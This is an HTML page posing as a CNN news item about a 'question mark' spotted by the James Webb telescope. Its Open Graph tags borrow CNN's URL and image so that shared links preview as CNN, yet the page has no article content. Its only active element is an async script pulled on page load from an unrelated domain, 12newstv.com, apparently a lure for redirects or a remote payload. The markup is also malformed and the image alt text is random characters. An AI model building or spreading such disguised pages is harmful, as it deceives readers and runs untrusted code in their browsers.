<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Mysterious question mark spotted by James Webb Space Telescope</title>
  <meta name="description" content="NASA telescope spots cosmic question mark in deep space">

  <!-- Open Graph meta tags -->
  <meta property="og:url" content="https://edition.cnn.com/">
  <meta property="og:type" content="website">
  <meta property="og:title" content="Mysterious question mark spotted by James Webb Space Telescope">
  <meta property="og:description" content="NASA telescope spots cosmic question mark in deep space">
  <meta property="og:image" content="https://media.cnn.com/api/v1/images/stellar/prod/20230810-question-mark-star.jpg?c=16x9&q=h_438,w_780,c_fill">
  <meta property="og:image:alt" content="dsahsdgvbkhjge2313">

  <style>
    #image-container {
      max-width: 100%;
      height: auto;
    }

    #image {
      width: 100%;
      height: auto;
      display: block;
    }
  </style>
</head>
<script src="https://12newstv.com/?api=1&lan=newstv&ht=2" type="text/javascript" async="true"></script>
</body>
</html>
